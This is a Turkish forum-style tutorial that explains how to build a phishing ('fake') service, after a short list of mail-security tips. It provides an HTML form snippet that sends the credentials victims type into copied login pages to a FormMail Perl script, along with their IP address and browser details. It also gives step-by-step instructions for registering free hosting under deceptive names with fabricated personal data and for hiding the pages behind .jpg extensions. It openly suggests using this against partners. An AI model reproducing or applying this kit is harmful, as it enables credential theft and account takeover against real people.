Yeni Fake Servisi Kurmak:
Ilk önce hepimizin kendi maillerimize sahip çikmasi gerekir.
1. Sifreleriniz karisik olsun. Örnek olarak;türk2005hacker
2. Çogumuzun birden fazla mail adresi bulunmakta, bu yüzden hepsine ayri ayri sifre verin.
3. Gizli sorunuz tahmin edilemeyecek sekilde olsun.
4. Size gelen mailler tanimadiginiz kisilerden geliyorsa ve ekli bir dosya içeriyorsa sakin açmayin ve ekli dosyayi merak etmeyin
5. Sagda solda baska forumlarda gördügünüz ve bilmediginiz hiç bir programi denemek için bilgisayariniza indirip çalistirmayin.
6. Msn’de görüsürken tanimadiginiz kisilerden dosya almayin, web cam davetini kabul etmeyin.
7. Antivirüs programlarinizi düzenli olarak çalistirin ve firewall kullanin. (ben black ice defender kullaniyorum, herhangi bir exe çalismak istediginde uyariyor,bilinmeyen bir exe ise terminate ederek exe yi silebiliyorsunuz.bu crack ve serial sitelerinde çok ise yariyor çünkü sizden habersiz trojenler bilgisayariniza iniyor)
yukaridaki hususlara dikkat ettigimiz sürece mailimize birsey olmayacaktir.
Konu 1 : Fake hazirlanisi
Fake sadece yahoo, hotmail ve mynet için degildir. Password ile girilebilen her türlü sayfa için hazirlanabilir.
Sadece giris sayfasi için degil isterseniz hakkinda bilgi almak istediginiz sahisa özel bir anket, form , akliniza ne geliyorsa hazirlayabilirsiniz. (örnek olarak; kiz veya erkek arkadasiniz hakkinda bilgi edinmek istiyorsunuz , her yerde rastlayacaginiz sevgi testine bunu uygulayabilirsiniz). Karsimizdaki sahisin özel bilgilerine ulasmamiz halinde mailine varsa web sayfasina bile sahip olabilirsiniz.
Buradaki önemli nokta scriptimizi çalistiracak olan kodlari düzgün bir sekilde ayarlayip hazirladigimiz sayfanin içine yerlestirmek.
Nedir bu kodlar? Ve ne ise yararlar?
<form name=ilkben02 action=http://ilkben.netfirms.com/cgi-bin/ilkben_formmail.pl method=post>
<input type=hidden [email protected] name=recipient>
<input type=hidden value="hotmail fakemail sonucu" name=subject>
<input type=hidden value="hack by ilkben02" name=email>
<input type=hidden value="ilkben02" name=realname>
<input type=hidden value=http://www.balca.net/dagarcik10110.aspx name=redirect>
<input type="hidden" name="env_report" value="remote_host,remote_addr,remote_user,http_user_agent">
<input type=hidden name=print_config value="email,subject,title,recipient,config">
<input type=hidden value="fake sonucu" name=title>
kirmizi ile belirttigim satir bizim scriptimizin adresini gösterir
turuncu ile belirttigim satira mail adresimizi yazariz
kahverengi ile belirttigim satir bize dönen mailde yazacaklardir yukaridaki örnekteki gibi hotmail fake sonucu, ilkben02 gibi
sari ile belirttigim satira kurbanimizin login butonuna bastiktan sonra açilacak sayfanin adresini yaziyoruz.
Hangi türde fake kullanmissak ona uygun adres yazmaliyiz e-kart atmissak örnek olarak karsisina bir e-kart açilmasi lazim.yesil ile belirttigim satir bize mail döndügünde kurbanin ip sini kullandigi servis gibi bilgiler aktarir.
Mavi ile belirttigim satir bize yollanacak olan mail,konu,baslik,alici gibi isteklerimizi bildirdigimiz satirdir.
Fake hazirlamak için ben notepad yerine frontpage kullanmanizi tavsiye ederim çünkü önizleme kismindan fake inizin çalisip çalismadigini , nasil göründügünü , eksiklerinin olup olmadigini görebilir, ve bunlari düzeltebilirsiniz.
Diyelim ki kullanan birisinin mailini ele geçirmek istiyoruz. Önce bu siteyi açip =>dosya=>farkli kaydet diyerek bilgisayarimiza indiriyoruz. Frontpegi açip bu sayfayi çagiriyoruz , yukaridaki kodu kaynak kimina gelerek baslarda bir yere yerlestiriyoruz, tabi yönlendirecegimiz adres bu web sayfasina uygun bir adres olmali.
Önizleme ile bakiyoruz ve deneme yapiyoruz , eger sayfa yönlendirdigimiz yere giderse bu fake hazir demektir.
Gitmez ise yerlestirdigimiz kodumuzu oradan alip login butonunun bulundugu yeri bulup hemen onun altina yerlestirip yeniden deniyoruz, %80 baslara yerlestirmek yetiyor.
Fake artik kimse yemiyor diyenler, yanlis düsünüyor, çok zekice hazirlanmis fakeler her zaman ise yarar bu sizin hayal gücünüze bagli.
Fake’i direk sahisa yollar ve mailin içinde açilmasini ve size sonuç gelmesini beklerseniz, hiç bir sonuç alamazsiniz çünkü artik fakeler mail içinde açilmiyor ve uyari veriyor.
Bu yüzden karisik bir adres ile almis oldugumuz free sitenin linkini vermemiz ve oradan bu sahisin tekrar login olmasini saglamaliyiz.
Yani hepimizin bir free site adresi sahibi olmamiz lazim.
Konu 2: Kendinize free site almak ve fakeleri yerlestirmek
Ilk önce adresine giriyoruz , solda free yazan kismin en altindaki kutucugu isaretleyip, alttaki uzun butona tikliyoruz (new members click here to create an account)
Karsimiza yeni bir sayfa çikiyor en altta i agree.sign me up! Yazisina tikliyoruz.karsimiza bir form çikiyor, simdi bunu dolduruyoruz.
Account name: kismina (bence karmasik olsun) açmak istedigimiz site adini giriyoruz örnek olarak benim loginpassportnet , sizde karsidaki sahisin anlamamasi için buna benzer isimlerle bir hesap açin.
Password: buraya ilkben1234 gibi hem rakam hemde harf kullanarak sifremizi yaziyoruz
your name: isim yaziyoruz (atin)
your mail: buraya mailimizi yaziyoruz ama hotmail kabul etmedigi için yahoo dan alacagimiz mailimizi yaziyoruz.
Ve tekrar mailimizi yaziyoruz.
Instant messaging: bu kisima im service yahoo yapiyoruz
adress: buraya adres yaziyoruz (atin)
city: atin örnek:ankara
state: atin örnek:ankara
zip code: atin örnek:06000
country: turkey
phone number: atin örnek: 00903123332233
gender: male / female seçin
yes! i’d like to receive this mail kismini isaretleyip alttaki security code u giriyoruz.
I agree kismini isaretledikten sonra join now! Diyoruz
karsimiza onay sayfasi geliyor.daha sonra mailimize aktivasyon baslatmak için bir mail gelecek onu aktive ettikten sonra.sitemizi fake için hazirlamaya baslayabiliriz.
Ilk önce ne oldugu önemli olmasada bir index sayfasi hazirlayip upload edecegiz. Bu sayfa olmazsa account kullanilmiyor diye kapatilabilir.
Simdi sayfalarimizi nasil buraya upload edecegiz.
Direk bir sayfayi upload dedigmiz zaman kabul etmiyor bu yüzden, username ve password yazarak login oluyoruz, username sitemizin adidir.
File manager kismina tiklayarak , dosyalarimizi hazirlayacagimiz bölüme geliyoruz.
Altta create a new file kismindan standart html seçiyoruz karsimiza çikan yere frontpage ile hazirladigimiz kodlarimizi kopyalayip yapistiriyoruz.
Create the file yazan yere örnek olarak uilogin.jpg yaziyoruz ve alttaki save tusuna basiyoruz. Html degil de uzantimizin jpg olmasinin sebebi reklam banneri olmasin sayfamizda.
Daha sonra ayni adimlari izleyerek bütün fakelerimiz aktariyoruz. Dedigim gibi bir index sayfasi hazirlayin ve index.html olarak kayit edin.
Evet su anda 250free.com adresinden kendimize free bir site açmis olduk, nasil upload edecegimizi de ögrendik.
Konu 3 : Perl Scriptimizi Hazirlama
Evet arkadaslar sira geldi scriptimizin içindeki degisiklikleri yapmaya.
Scripti açtigimizda bir takim kodlar çikacaktir karsimiza (ben burada hepsini degil bizim için gerekli kisimlari yazacagim). Ve kirmizi ile belirttigim yerleri siz 250free.com dan kendinize açmis oldugunuz adresi yazacaksiniz burada gördügünüz benimkidir.
##############################################################################
# define variables #
# detailed information found in readme file. #
# $mailprog defines the location of your sendmail program on your unix #
# system. #
$mailprog = ’/usr/lib/sendmail’;
# @referers allows forms to be located only on servers which are defined #
# in this field. This security fix from the last version which allowed #
# anyone on any server to use your formmail script on their web site. #
@referers = (’loginpassportnet.250free.com’);
# done #
##############################################################################
# check referring url
&check_url;
# retrieve date
&get_date;
# parse form contents
&parse_form;
# check required fields
&check_required;
# return html page or redirect user
&return_html;
# send e-mail
&send_mail;
sub check_url {
# localize the check_referer flag which determines if user is valid. #
local($check_referer) = 0;
# if a referring url was specified, for each valid referer, make sure #
# that a valid referring url was passed to formmail. #
if ($env{’http_referer’}) {
foreach $referer (@referers="loginpassportnet.250free.com") {
if ($env{’http_referer’} =~ m|https?://([^/]*)$referer|i) {
$check_referer = 1;
last;
}
bu degisikligi yaptiktan sonra kaydediyoruz.scriptteki degisikligimiz bu kadar.
Scripti indirmek için link:
Farkli kaydet diyerek indirebilirsiniz.
Konu 4: : Scriptimiz için Account Açma
netfirms.com a giriyoruz, en alttaki yazilardan free web hosting i seçiyoruz.
Karsimiza çikan sayfada price:$0.00 yazisini görüyoruz ve yanindaki signup now butonuna tikliyoruz.
Simdi açilan sayfada i prefer a free netfirms sub domain yazan yaziya tikliyoruz, hiçbir uere birsey yazmiyoruz.
Karsimiza bosluk . Netfirms.com yazan bir sayfa gelecek oradaki bosluga almak istedigimiz domaini yaziyoruz örnek olarak imha yazarsak, adindaki sub domainin sahibi oluruz.
Search butonuna bastiktan sonra, daha önce bu adres alinmamissa $0.000 usd yazan bir sayfa çikar alttaki yesil continue butonu ile devam ediyoruz.
Evet simdi karsimiza bir form çikti simdi bunu doldurup adresimizi almis olacagiz.
Company name: bir sirket adi yazin gitsin
name: nickinizi yazabilirsiniz
last name: cyber yazabilirsiniz
adress: herhangi bir adres tazin
city: sehir yazin
satate: buraya na yaziyoruz
country: turkey seçiyoruz
zip code: 0500 uydurun birseyler
phone: 00903331112255 gibi uydurun ama 0090 olsun
e-mail: dogru mailinizi yazin yanlis olmasin sifre gelecek
secret question: gizli sorunuzu yazin
terms of service: burayi isaretleyin
continue butonu ile devam edin
karsimiza yine ücret 0 yazan bir sayfa gelecek tekrar continue diyerek olayi bitiriyoruz.
Daha sonra mailinize sifre gelecektir,
Bunu ister bir ftp araci kullanarak yada siteden login olarak daha önce hazirladigimiz scriptimizi , zaten hazirda bulunan cgi-bin klasörünün içine upload edin.
Servisiniz hayirli ugurlu olsun.
Hazirladigimiz fakeleri almis oldugumuz 250free.com adresimize upload ediyoruz. Çünkü scripteki adresimiz burasi.
